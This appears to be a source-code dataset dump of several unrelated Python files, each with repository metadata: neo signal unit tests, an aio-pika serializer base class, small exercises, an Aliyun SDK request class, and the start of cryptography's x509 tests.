description='eggs', file_origin='testfile.txt',
arg1='test')
t_start = 15
t_stop = 250
t_start = 0.015 * pq.s
t_stop = .250 * pq.s
result = self.signal1.time_slice(t_start, t_stop)
assert_array_equal(result, targ_signal)
assert_array_equal(result.times, targtimequant)
self.assertEqual(result.units, 1 * pq.mV)
self.assertIsInstance(result, IrregularlySampledSignal)
assert_neo_object_is_compliant(result)
self.assertEqual(result.name, 'spam')
self.assertEqual(result.description, 'eggs')
self.assertEqual(result.file_origin, 'testfile.txt')
self.assertEqual(result.annotations, {'arg1': 'test'})
assert_arrays_equal(result.array_annotations['anno1'], np.array([23]))
assert_arrays_equal(result.array_annotations['anno2'], np.array(['A']))
self.assertIsInstance(result.array_annotations, ArrayDict)
def test__time_slice_should_set_parents_to_None(self):
# When timeslicing, a deep copy is made,
# thus the reference to parent objects should be destroyed
result = self.signal1.time_slice(1 * pq.ms, 3 * pq.ms)
self.assertEqual(result.segment, None)
self.assertEqual(result.channel_index, None)
def test__deepcopy_should_set_parents_objects_to_None(self):
# Deepcopy should destroy references to parents
result = deepcopy(self.signal1)
self.assertEqual(result.segment, None)
self.assertEqual(result.channel_index, None)
def test__time_shift_same_attributes(self):
result = self.signal1.time_shift(1 * pq.ms)
assert_same_attributes(result, self.signal1, exclude=['times', 't_start', 't_stop'])
def test__time_shift_same_annotations(self):
result = self.signal1.time_shift(1 * pq.ms)
assert_same_annotations(result, self.signal1)
def test__time_shift_same_array_annotations(self):
result = self.signal1.time_shift(1 * pq.ms)
assert_same_array_annotations(result, self.signal1)
def test__time_shift_should_set_parents_to_None(self):
# When time-shifting, a deep copy is made,
# thus the reference to parent objects should be destroyed
result = self.signal1.time_shift(1 * pq.ms)
self.assertEqual(result.segment, None)
self.assertEqual(result.channel_index, None)
def test__time_shift_by_zero(self):
shifted = self.signal1.time_shift(0 * pq.ms)
assert_arrays_equal(shifted.times, self.signal1.times)
def test__time_shift_same_units(self):
shifted = self.signal1.time_shift(10 * pq.ms)
assert_arrays_equal(shifted.times, self.signal1.times + 10 * pq.ms)
def test__time_shift_different_units(self):
shifted = self.signal1.time_shift(1 * pq.s)
assert_arrays_equal(shifted.times, self.signal1.times + 1000 * pq.ms)
def test_as_array(self):
sig_as_arr = self.signal1.as_array()
self.assertIsInstance(sig_as_arr, np.ndarray)
assert_array_equal(self.data1, sig_as_arr.flat)
def test_as_quantity(self):
sig_as_q = self.signal1.as_quantity()
self.assertIsInstance(sig_as_q, pq.Quantity)
assert_array_equal(self.data1, sig_as_q.magnitude.flat)
def test__copy_should_preserve_parent_objects(self):
result = self.signal1.copy()
self.assertIs(result.segment, self.signal1.segment)
self.assertIs(result.channel_index, self.signal1.channel_index)
class TestIrregularlySampledSignalCombination(unittest.TestCase):
def setUp(self):
self.data1 = np.arange(10.0)
self.data1quant = self.data1 * pq.mV
self.time1 = np.logspace(1, 5, 10)
self.time1quant = self.time1 * pq.ms
self.arr_ann = {'anno1': [23], 'anno2': ['A']}
self.signal1 = IrregularlySampledSignal(self.time1quant, signal=self.data1quant,
name='spam', description='eggs',
file_origin='testfile.txt', arg1='test',
array_annotations=self.arr_ann)
def test__compliant(self):
assert_neo_object_is_compliant(self.signal1)
self.assertEqual(self.signal1.name, 'spam')
self.assertEqual(self.signal1.description, 'eggs')
self.assertEqual(self.signal1.file_origin, 'testfile.txt')
self.assertEqual(self.signal1.annotations, {'arg1': 'test'})
assert_arrays_equal(self.signal1.array_annotations['anno1'], np.array([23]))
assert_arrays_equal(self.signal1.array_annotations['anno2'], np.array(['A']))
self.assertIsInstance(self.signal1.array_annotations, ArrayDict)
def test__add_const_quantity_should_preserve_data_complement(self):
result = self.signal1 + 0.065 * pq.V
self.assertIsInstance(result, IrregularlySampledSignal)
assert_neo_object_is_compliant(result)
self.assertEqual(result.name, 'spam')
self.assertEqual(result.description, 'eggs')
self.assertEqual(result.file_origin, 'testfile.txt')
self.assertEqual(result.annotations, {'arg1': 'test'})
assert_arrays_equal(result.array_annotations['anno1'], np.array([23]))
assert_arrays_equal(result.array_annotations['anno2'], np.array(['A']))
self.assertIsInstance(result.array_annotations, ArrayDict)
assert_array_equal(result.magnitude, self.data1.reshape(-1, 1) + 65)
assert_array_equal(result.times, self.time1quant)
self.assertEqual(self.signal1[9], 9 * pq.mV)
self.assertEqual(result[9], 74 * pq.mV)
def test__add_two_consistent_signals_should_preserve_data_complement(self):
data2 = np.arange(10.0, 20.0)
data2quant = data2 * pq.mV
signal2 = IrregularlySampledSignal(self.time1quant, signal=data2quant)
assert_neo_object_is_compliant(signal2)
result = self.signal1 + signal2
self.assertIsInstance(result, IrregularlySampledSignal)
assert_neo_object_is_compliant(result)
self.assertEqual(result.name, 'spam')
self.assertEqual(result.description, 'eggs')
self.assertEqual(result.file_origin, 'testfile.txt')
self.assertEqual(result.annotations, {'arg1': 'test'})
assert_arrays_equal(result.array_annotations['anno1'], np.array([23]))
assert_arrays_equal(result.array_annotations['anno2'], np.array(['A']))
self.assertIsInstance(result.array_annotations, ArrayDict)
targ = IrregularlySampledSignal(self.time1quant, signal=np.arange(10.0, 30.0, 2.0),
units="mV", name='spam', description='eggs',
file_origin='testfile.txt', arg1='test')
assert_neo_object_is_compliant(targ)
assert_array_equal(result, targ)
assert_array_equal(self.time1quant, targ.times)
assert_array_equal(result.times, targ.times)
assert_same_sub_schema(result, targ)
def test__add_signals_with_inconsistent_times_ValueError(self):
signal2 = IrregularlySampledSignal(self.time1quant * 2., signal=np.arange(10.0),
units="mV")
assert_neo_object_is_compliant(signal2)
self.assertRaises(ValueError, self.signal1.__add__, signal2)
def test__add_signals_with_inconsistent_dimension_ValueError(self):
signal2 = np.arange(20).reshape(2, 10)
self.assertRaises(ValueError, self.signal1.__add__, signal2)
def test__subtract_const_should_preserve_data_complement(self):
result = self.signal1 - 65 * pq.mV
self.assertIsInstance(result, IrregularlySampledSignal)
assert_neo_object_is_compliant(result)
self.assertEqual(result.name, 'spam')
self.assertEqual(result.description, 'eggs')
self.assertEqual(result.file_origin, 'testfile.txt')
self.assertEqual(result.annotations, {'arg1': 'test'})
assert_arrays_equal(result.array_annotations['anno1'], np.array([23]))
assert_arrays_equal(result.array_annotations['anno2'], np.array(['A']))
self.assertIsInstance(result.array_annotations, ArrayDict)
self.assertEqual(self.signal1[9], 9 * pq.mV)
self.assertEqual(result[9], -56 * pq.mV)
assert_array_equal(result.magnitude, (self.data1 - 65).reshape(-1, 1))
assert_array_equal(result.times, self.time1quant)
def test__subtract_from_const_should_return_signal(self):
result = 10 * pq.mV - self.signal1
self.assertIsInstance(result, IrregularlySampledSignal)
assert_neo_object_is_compliant(result)
self.assertEqual(result.name, 'spam')
self.assertEqual(result.description, 'eggs')
self.assertEqual(result.file_origin, 'testfile.txt')
self.assertEqual(result.annotations, {'arg1': 'test'})
assert_arrays_equal(result.array_annotations['anno1'], np.array([23]))
assert_arrays_equal(result.array_annotations['anno2'], np.array(['A']))
self.assertIsInstance(result.array_annotations, ArrayDict)
self.assertEqual(self.signal1[9], 9 * pq.mV)
self.assertEqual(result[9], 1 * pq.mV)
assert_array_equal(result.magnitude, (10 - self.data1).reshape(-1, 1))
assert_array_equal(result.times, self.time1quant)
def test__mult_signal_by_const_float_should_preserve_data_complement(self):
result = self.signal1 * 2.
self.assertIsInstance(result, IrregularlySampledSignal)
assert_neo_object_is_compliant(result)
self.assertEqual(result.name, 'spam')
self.assertEqual(result.description, 'eggs')
self.assertEqual(result.file_origin, 'testfile.txt')
self.assertEqual(result.annotations, {'arg1': 'test'})
assert_arrays_equal(result.array_annotations['anno1'], np.array([23]))
assert_arrays_equal(result.array_annotations['anno2'], np.array(['A']))
self.assertIsInstance(result.array_annotations, ArrayDict)
self.assertEqual(self.signal1[9], 9 * pq.mV)
self.assertEqual(result[9], 18 * pq.mV)
assert_array_equal(result.magnitude, self.data1.reshape(-1, 1) * 2)
assert_array_equal(result.times, self.time1quant)
def test__mult_signal_by_const_array_should_preserve_data_complement(self):
result = self.signal1 * np.array(2.)
self.assertIsInstance(result, IrregularlySampledSignal)
assert_neo_object_is_compliant(result)
self.assertEqual(result.name, 'spam')
self.assertEqual(result.description, 'eggs')
self.assertEqual(result.file_origin, 'testfile.txt')
self.assertEqual(result.annotations, {'arg1': 'test'})
assert_arrays_equal(result.array_annotations['anno1'], np.array([23]))
assert_arrays_equal(result.array_annotations['anno2'], np.array(['A']))
self.assertIsInstance(result.array_annotations, ArrayDict)
self.assertEqual(self.signal1[9], 9 * pq.mV)
self.assertEqual(result[9], 18 * pq.mV)
assert_array_equal(result.magnitude, self.data1.reshape(-1, 1) * 2)
assert_array_equal(result.times, self.time1quant)
def test__divide_signal_by_const_should_preserve_data_complement(self):
result = self.signal1 / 0.5
self.assertIsInstance(result, IrregularlySampledSignal)
assert_neo_object_is_compliant(result)
self.assertEqual(result.name, 'spam')
self.assertEqual(result.description, 'eggs')
self.assertEqual(result.file_origin, 'testfile.txt')
self.assertEqual(result.annotations, {'arg1': 'test'})
assert_arrays_equal(result.array_annotations['anno1'], np.array([23]))
assert_arrays_equal(result.array_annotations['anno2'], np.array(['A']))
self.assertIsInstance(result.array_annotations, ArrayDict)
self.assertEqual(self.signal1[9], 9 * pq.mV)
self.assertEqual(result[9], 18 * pq.mV)
assert_array_equal(result.magnitude, self.data1.reshape(-1, 1) / 0.5)
assert_array_equal(result.times, self.time1quant)
@unittest.skipUnless(HAVE_IPYTHON, "requires IPython")
def test__pretty(self):
res = pretty(self.signal1)
signal = self.signal1
targ = (("IrregularlySampledSignal with %d channels of length %d; units %s; datatype %s \n"
"" % (signal.shape[1], signal.shape[0], signal.units.dimensionality.unicode,
signal.dtype))
+ ("name: '%s'\ndescription: '%s'\n" % (signal.name, signal.description))
+ ("annotations: %s\n" % str(signal.annotations))
+ ("sample times: %s" % (signal.times[:10],)))
self.assertEqual(res, targ)
def test__merge(self):
data1 = np.arange(1000.0, 1066.0).reshape((11, 6)) * pq.uV
data2 = np.arange(2.0, 2.033, 0.001).reshape((11, 3)) * pq.mV
times1 = np.arange(11.0) * pq.ms
times2 = np.arange(1.0, 12.0) * pq.ms
arr_ann1 = {'anno1': np.arange(6), 'anno2': ['a', 'b', 'c', 'd', 'e', 'f']}
arr_ann2 = {'anno1': np.arange(100, 103), 'anno3': []}
signal1 = IrregularlySampledSignal(times1, data1, name='signal1',
description='test signal', file_origin='testfile.txt',
array_annotations=arr_ann1)
signal2 = IrregularlySampledSignal(times1, data2, name='signal2',
description='test signal', file_origin='testfile.txt',
array_annotations=arr_ann2)
signal3 = IrregularlySampledSignal(times2, data2, name='signal3',
description='test signal', file_origin='testfile.txt')
with warnings.catch_warnings(record=True) as w:
merged12 = signal1.merge(signal2)
self.assertTrue(len(w) == 1)
self.assertEqual(w[0].category, UserWarning)
self.assertSequenceEqual(str(w[0].message), "The following array annotations were "
"omitted, because they were only present"
" in one of the merged objects: "
"['anno2'] from the one that was merged "
"into and ['anno3'] from the one that "
"was merged into the other")
target_data12 = np.hstack([data1, data2.rescale(pq.uV)])
assert_neo_object_is_compliant(signal1)
assert_neo_object_is_compliant(signal2)
assert_neo_object_is_compliant(merged12)
self.assertAlmostEqual(merged12[5, 0], 1030.0 * pq.uV, 9)
self.assertAlmostEqual(merged12[5, 6], 2015.0 * pq.uV, 9)
self.assertEqual(merged12.name, 'merge(signal1, signal2)')
self.assertEqual(merged12.file_origin, 'testfile.txt')
assert_arrays_equal(merged12.array_annotations['anno1'],
np.array([0, 1, 2, 3, 4, 5, 100, 101, 102]))
self.assertIsInstance(merged12.array_annotations, ArrayDict)
assert_arrays_equal(merged12.magnitude, target_data12)
self.assertRaises(MergeError, signal1.merge, signal3)
class TestIrregularlySampledSignalFunctions(unittest.TestCase):
def test__pickle(self):
signal1 = IrregularlySampledSignal(np.arange(10.0) / 100 * pq.s, np.arange(10.0),
units="mV")
fobj = open('./pickle', 'wb')
pickle.dump(signal1, fobj)
fobj.close()
fobj = open('./pickle', 'rb')
try:
signal2 = pickle.load(fobj)
except ValueError:
signal2 = None
assert_array_equal(signal1, signal2)
fobj.close()
os.remove('./pickle')
class TestIrregularlySampledSignalEquality(unittest.TestCase):
def test__signals_with_different_times_should_be_not_equal(self):
signal1 = IrregularlySampledSignal(np.arange(10.0) / 100 * pq.s, np.arange(10.0),
units="mV")
signal2 = IrregularlySampledSignal(np.arange(10.0) / 100 * pq.ms, np.arange(10.0),
units="mV")
self.assertNotEqual(signal1, signal2)
if __name__ == "__main__":
unittest.main()
| 49.063983 | 99 | 0.640326 | 5,565 | 47,543 | 5.277448 | 0.079605 | 0.076101 | 0.069359 | 0.019102 | 0.755933 | 0.72093 | 0.694338 | 0.667711 | 0.637407 | 0.611836 | 0 | 0.037789 | 0.234104 | 47,543 | 968 | 100 | 49.114669 | 0.768764 | 0.02238 | 0 | 0.547194 | 0 | 0 | 0.058299 | 0.004177 | 0 | 0 | 0 | 0 | 0.501276 | 1 | 0.090561 | false | 0 | 0.020408 | 0 | 0.119898 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 3 |
7c2a8bdac271337f93e880a885f56ed4b95de212 | 1,345 | py | Python | aio_pika/patterns/base.py | homersoft/aio-pika | 7438e4ee86b8944d38907d3042c8d5605d68c81e | ["Apache-2.0"] | null | null | null | aio_pika/patterns/base.py | homersoft/aio-pika | 7438e4ee86b8944d38907d3042c8d5605d68c81e | ["Apache-2.0"] | null | null | null | aio_pika/patterns/base.py | homersoft/aio-pika | 7438e4ee86b8944d38907d3042c8d5605d68c81e | ["Apache-2.0"] | null | null | null | import pickle
from typing import Any, Callable
class Method:
__slots__ = (
"name",
"func",
)
def __init__(self, name: str, func: Callable[..., Any]):
self.name = name
self.func = func
def __getattr__(self, item: str) -> "Method":
return Method(".".join((self.name, item)), func=self.func)
def __call__(self, **kwargs: Any) -> Any:
return self.func(self.name, kwargs=kwargs)
class Proxy:
__slots__ = ("func",)
def __init__(self, func: Callable[..., Any]):
self.func = func
def __getattr__(self, item: str) -> Method:
return Method(item, self.func)
class Base:
SERIALIZER = pickle
CONTENT_TYPE = "application/python-pickle"
def serialize(self, data: Any) -> bytes:
""" Serialize data to the bytes.
Uses `pickle` by default.
You should overlap this method when you want to change serializer
:param data: Data which will be serialized
"""
return self.SERIALIZER.dumps(data)
def deserialize(self, data: bytes) -> Any:
""" Deserialize data from bytes.
Uses `pickle` by default.
Override this method if you want to change the serializer.
:param data: Data which will be deserialized
"""
return self.SERIALIZER.loads(data)
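# --- Illustrative sketch, not part of the original file ---
# The docstrings above say the serializer can be swapped by overriding
# SERIALIZER / CONTENT_TYPE / serialize / deserialize, and that Proxy and
# Method turn attribute access into dotted call names.  A minimal example of
# both ideas follows; the JsonBase subclass is hypothetical, not aio-pika API.
import json


class JsonBase(Base):
    SERIALIZER = json
    CONTENT_TYPE = "application/json"

    def serialize(self, data: Any) -> bytes:
        # json.dumps returns str, so encode it to keep the bytes contract;
        # the inherited deserialize works as-is because json.loads accepts
        # bytes on Python 3.6+.
        return self.SERIALIZER.dumps(data).encode()


# Proxy(func) composes dotted names: the call below ends up invoking
# func("math.add", kwargs={"x": 1, "y": 2}).
proxy = Proxy(lambda name, kwargs: (name, kwargs))
assert proxy.math.add(x=1, y=2) == ("math.add", {"x": 1, "y": 2})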
| 25.377358 | 73 | 0.610409 | 162 | 1,345 | 4.888889 | 0.320988 | 0.060606 | 0.027778 | 0.037879 | 0.388889 | 0.388889 | 0.388889 | 0.388889 | 0.388889 | 0.388889 | 0 | 0 | 0.277323 | 1,345 | 52 | 74 | 25.865385 | 0.814815 | 0.246097 | 0 | 0.074074 | 0 | 0 | 0.047059 | 0.026738 | 0 | 0 | 0 | 0 | 0 | 1 | 0.259259 | false | 0 | 0.074074 | 0.111111 | 0.777778 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 3 |
7c3050e5fc98b66c7e1fa269352e4262de180b09 | 177 | py | Python | test/todo/domain/test_frequency_db_name.py | MarkStefanovic/todo-api | fb6198511712df853e693787839533f0c9956178 | ["MIT"] | null | null | null | test/todo/domain/test_frequency_db_name.py | MarkStefanovic/todo-api | fb6198511712df853e693787839533f0c9956178 | ["MIT"] | null | null | null | test/todo/domain/test_frequency_db_name.py | MarkStefanovic/todo-api | fb6198511712df853e693787839533f0c9956178 | ["MIT"] | null | null | null | from src import core
if __name__ == "__main__":
n = core.FrequencyDbName.DAILY
assert n == "daily"
print(n)
print(repr(n))
x = core.FrequencyDbName("todo")
| 19.666667 | 36 | 0.632768 | 23 | 177 | 4.521739 | 0.652174 | 0.365385 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.231638 | 177 | 8 | 37 | 22.125 | 0.764706 | 0 | 0 | 0 | 0 | 0 | 0.096045 | 0 | 0 | 0 | 0 | 0 | 0.142857 | 1 | 0 | false | 0 | 0.142857 | 0 | 0.142857 | 0.285714 | 1 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 3 |
7c33481b6158455cf60525f5ced765bba063e1ba | 447 | py | Python | codestepbystep/count_to_by.py | aleeper/python_sandbox | 2c320e043735f99fac68308fe2692c819cf5a636 | ["MIT"] | null | null | null | codestepbystep/count_to_by.py | aleeper/python_sandbox | 2c320e043735f99fac68308fe2692c819cf5a636 | ["MIT"] | null | null | null | codestepbystep/count_to_by.py | aleeper/python_sandbox | 2c320e043735f99fac68308fe2692c819cf5a636 | ["MIT"] | null | null | null | def get_string_count_to_by(to, by):
if by < 1:
raise ValueError("'by' must be > 0")
if to < 1:
raise ValueError("'to' must be > 0")
if to <= by:
return str(to)
return get_string_count_to_by(to - by, by) + ", " + str(to)
def count_to_by(to, by):
print(get_string_count_to_by(to, by))
def main():
count_to_by(10,1)
count_to_by(34,5)
count_to_by(17,3)
if __name__ == '__main__':
main()
| 21.285714 | 63 | 0.588367 | 78 | 447 | 3.012821 | 0.294872 | 0.204255 | 0.268085 | 0.187234 | 0.429787 | 0.280851 | 0.280851 | 0 | 0 | 0 | 0 | 0.039514 | 0.263982 | 447 | 20 | 64 | 22.35 | 0.674772 | 0 | 0 | 0 | 0 | 0 | 0.09396 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.1875 | false | 0 | 0 | 0 | 0.3125 | 0.0625 | 0 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 3 |
7c3c1e943fef73d42bafa5e9c1b474901c314ea9 | 2,739 | py | Python | aliyun-python-sdk-dms-enterprise/aliyunsdkdms_enterprise/request/v20181101/ListInstancesRequest.py | liumihust/aliyun-openapi-python-sdk | c7b5dd4befae4b9c59181654289f9272531207ef | ["Apache-2.0"] | null | null | null | aliyun-python-sdk-dms-enterprise/aliyunsdkdms_enterprise/request/v20181101/ListInstancesRequest.py | liumihust/aliyun-openapi-python-sdk | c7b5dd4befae4b9c59181654289f9272531207ef | ["Apache-2.0"] | 1 | 2020-05-31T14:51:47.000Z | 2020-05-31T14:51:47.000Z | aliyun-python-sdk-dms-enterprise/aliyunsdkdms_enterprise/request/v20181101/ListInstancesRequest.py | liumihust/aliyun-openapi-python-sdk | c7b5dd4befae4b9c59181654289f9272531207ef | ["Apache-2.0"] | null | null | null | # Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
#
# http://www.apache.org/licenses/LICENSE-2.0
#
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
from aliyunsdkcore.request import RpcRequest
from aliyunsdkdms_enterprise.endpoint import endpoint_data
class ListInstancesRequest(RpcRequest):
def __init__(self):
RpcRequest.__init__(self, 'dms-enterprise', '2018-11-01', 'ListInstances','dmsenterprise')
if hasattr(self, "endpoint_map"):
setattr(self, "endpoint_map", endpoint_data.getEndpointMap())
if hasattr(self, "endpoint_regional"):
setattr(self, "endpoint_regional", endpoint_data.getEndpointRegional())
def get_SearchKey(self):
return self.get_query_params().get('SearchKey')
def set_SearchKey(self,SearchKey):
self.add_query_param('SearchKey',SearchKey)
def get_Tid(self):
return self.get_query_params().get('Tid')
def set_Tid(self,Tid):
self.add_query_param('Tid',Tid)
def get_InstanceState(self):
return self.get_query_params().get('InstanceState')
def set_InstanceState(self,InstanceState):
self.add_query_param('InstanceState',InstanceState)
def get_PageNumber(self):
return self.get_query_params().get('PageNumber')
def set_PageNumber(self,PageNumber):
self.add_query_param('PageNumber',PageNumber)
def get_NetType(self):
return self.get_query_params().get('NetType')
def set_NetType(self,NetType):
self.add_query_param('NetType',NetType)
def get_DbType(self):
return self.get_query_params().get('DbType')
def set_DbType(self,DbType):
self.add_query_param('DbType',DbType)
def get_EnvType(self):
return self.get_query_params().get('EnvType')
def set_EnvType(self,EnvType):
self.add_query_param('EnvType',EnvType)
def get_InstanceSource(self):
return self.get_query_params().get('InstanceSource')
def set_InstanceSource(self,InstanceSource):
self.add_query_param('InstanceSource',InstanceSource)
def get_PageSize(self):
return self.get_query_params().get('PageSize')
def set_PageSize(self,PageSize):
self.add_query_param('PageSize',PageSize) | 32.223529 | 92 | 0.758306 | 370 | 2,739 | 5.424324 | 0.310811 | 0.026906 | 0.06278 | 0.076233 | 0.139013 | 0.139013 | 0.139013 | 0 | 0 | 0 | 0 | 0.005068 | 0.135451 | 2,739 | 85 | 93 | 32.223529 | 0.842483 | 0.275283 | 0 | 0 | 0 | 0 | 0.136958 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.422222 | false | 0 | 0.044444 | 0.2 | 0.688889 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 3 |
7c4493dcbfca95c195eb7212d69f702245111712 | 620 | py | Python | uds/utilities/__init__.py | mdabrowski1990/uds | 1aee0c1de446ee3dd461706949504f2c218db1e8 | [
"MIT"
] | 18 | 2021-03-28T22:39:18.000Z | 2022-02-13T21:50:37.000Z | uds/utilities/__init__.py | mdabrowski1990/uds | 1aee0c1de446ee3dd461706949504f2c218db1e8 | [
"MIT"
] | 153 | 2021-02-09T09:27:05.000Z | 2022-03-29T06:09:15.000Z | uds/utilities/__init__.py | mdabrowski1990/uds | 1aee0c1de446ee3dd461706949504f2c218db1e8 | [
"MIT"
] | 1 | 2021-05-13T16:01:46.000Z | 2021-05-13T16:01:46.000Z | """Various helper functions, classes and variables that are shared and reused within the project."""
from .enums import ValidatedEnum, ExtendableEnum, ByteEnum, NibbleEnum
from .common_types import Nibble, RawByte, RawBytes, RawBytesTuple, RawBytesList, RawBytesSet, \
validate_nibble, validate_raw_bytes, validate_raw_byte, \
TimeMilliseconds
from .bytes_operations import Endianness, EndiannessAlias, int_to_bytes_list, bytes_list_to_int
from .custom_exceptions import ReassignmentError, InconsistentArgumentsError, AmbiguityError, \
UnusedArgumentError
from .custom_warnings import UnusedArgumentWarning
| 56.363636 | 100 | 0.835484 | 67 | 620 | 7.507463 | 0.701493 | 0.043738 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.109677 | 620 | 10 | 101 | 62 | 0.911232 | 0.151613 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 0.625 | 0 | 0.625 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 3 |
7c45660fbf28183fb31bd82bbfed828e456a6d37 | 187,644 | py | Python | tests/x509/test_x509.py | mattsb42-aws/cryptography | e687b8f7f40e30ef88e9de889c55cd7fdec99762 | [
"PSF-2.0",
"Apache-2.0",
"BSD-3-Clause"
] | 2 | 2021-01-30T13:23:54.000Z | 2021-06-07T21:35:19.000Z | tests/x509/test_x509.py | mattsb42-aws/cryptography | e687b8f7f40e30ef88e9de889c55cd7fdec99762 | [
"PSF-2.0",
"Apache-2.0",
"BSD-3-Clause"
] | 7 | 2019-11-28T21:48:38.000Z | 2020-08-02T18:06:40.000Z | tests/x509/test_x509.py | mattsb42-aws/cryptography | e687b8f7f40e30ef88e9de889c55cd7fdec99762 | [
"PSF-2.0",
"Apache-2.0",
"BSD-3-Clause"
] | 6 | 2020-05-29T21:46:30.000Z | 2020-12-15T20:32:19.000Z | # -*- coding: utf-8 -*-
# This file is dual licensed under the terms of the Apache License, Version
# 2.0, and the BSD License. See the LICENSE file in the root of this repository
# for complete details.
from __future__ import absolute_import, division, print_function
import binascii
import collections
import datetime
import ipaddress
import os
import pytest
import pytz
import six
from cryptography import utils, x509
from cryptography.exceptions import UnsupportedAlgorithm
from cryptography.hazmat._der import (
BIT_STRING, CONSTRUCTED, CONTEXT_SPECIFIC, DERReader, GENERALIZED_TIME,
INTEGER, OBJECT_IDENTIFIER, PRINTABLE_STRING, SEQUENCE, SET, UTC_TIME
)
from cryptography.hazmat.backends.interfaces import (
DSABackend, EllipticCurveBackend, RSABackend, X509Backend
)
from cryptography.hazmat.primitives import hashes, serialization
from cryptography.hazmat.primitives.asymmetric import (
dsa, ec, ed25519, ed448, padding, rsa
)
from cryptography.hazmat.primitives.asymmetric.utils import (
decode_dss_signature
)
from cryptography.x509.name import _ASN1Type
from cryptography.x509.oid import (
AuthorityInformationAccessOID, ExtendedKeyUsageOID, ExtensionOID,
NameOID, SignatureAlgorithmOID
)
from ..hazmat.primitives.fixtures_dsa import DSA_KEY_2048
from ..hazmat.primitives.fixtures_ec import EC_KEY_SECP256R1
from ..hazmat.primitives.fixtures_rsa import RSA_KEY_2048, RSA_KEY_512
from ..hazmat.primitives.test_ec import _skip_curve_unsupported
from ..utils import load_vectors_from_file
@utils.register_interface(x509.ExtensionType)
class DummyExtension(object):
oid = x509.ObjectIdentifier("1.2.3.4")
@utils.register_interface(x509.GeneralName)
class FakeGeneralName(object):
def __init__(self, value):
self._value = value
value = utils.read_only_property("_value")
def _load_cert(filename, loader, backend):
cert = load_vectors_from_file(
filename=filename,
loader=lambda pemfile: loader(pemfile.read(), backend),
mode="rb"
)
return cert
ParsedCertificate = collections.namedtuple(
"ParsedCertificate",
["not_before_tag", "not_after_tag", "issuer", "subject"]
)
def _parse_cert(der):
# See the Certificate structure defined in RFC 5280.
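#
# For reference, the fields are read in the order given by the ASN.1
# definitions in RFC 5280, sections 4.1.1 and 4.1.2 (reproduced here as
# descriptive comments only):
#
#   Certificate  ::=  SEQUENCE  {
#       tbsCertificate       TBSCertificate,
#       signatureAlgorithm   AlgorithmIdentifier,
#       signatureValue       BIT STRING  }
#
#   TBSCertificate  ::=  SEQUENCE  {
#       version         [0]  EXPLICIT Version DEFAULT v1,
#       serialNumber         CertificateSerialNumber,
#       signature            AlgorithmIdentifier,
#       issuer               Name,
#       validity             Validity,
#       subject              Name,
#       subjectPublicKeyInfo SubjectPublicKeyInfo,
#       issuerUniqueID  [1]  IMPLICIT UniqueIdentifier OPTIONAL,
#       subjectUniqueID [2]  IMPLICIT UniqueIdentifier OPTIONAL,
#       extensions      [3]  EXPLICIT Extensions OPTIONAL  }
#
#   Validity ::= SEQUENCE {
#       notBefore      Time,
#       notAfter       Time }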
with DERReader(der).read_single_element(SEQUENCE) as cert:
tbs_cert = cert.read_element(SEQUENCE)
# Skip outer signature algorithm
_ = cert.read_element(SEQUENCE)
# Skip signature
_ = cert.read_element(BIT_STRING)
with tbs_cert:
# Skip version
_ = tbs_cert.read_optional_element(CONTEXT_SPECIFIC | CONSTRUCTED | 0)
# Skip serialNumber
_ = tbs_cert.read_element(INTEGER)
# Skip inner signature algorithm
_ = tbs_cert.read_element(SEQUENCE)
issuer = tbs_cert.read_element(SEQUENCE)
validity = tbs_cert.read_element(SEQUENCE)
subject = tbs_cert.read_element(SEQUENCE)
# Skip subjectPublicKeyInfo
_ = tbs_cert.read_element(SEQUENCE)
# Skip issuerUniqueID
_ = tbs_cert.read_optional_element(CONTEXT_SPECIFIC | CONSTRUCTED | 1)
# Skip subjectUniqueID
_ = tbs_cert.read_optional_element(CONTEXT_SPECIFIC | CONSTRUCTED | 2)
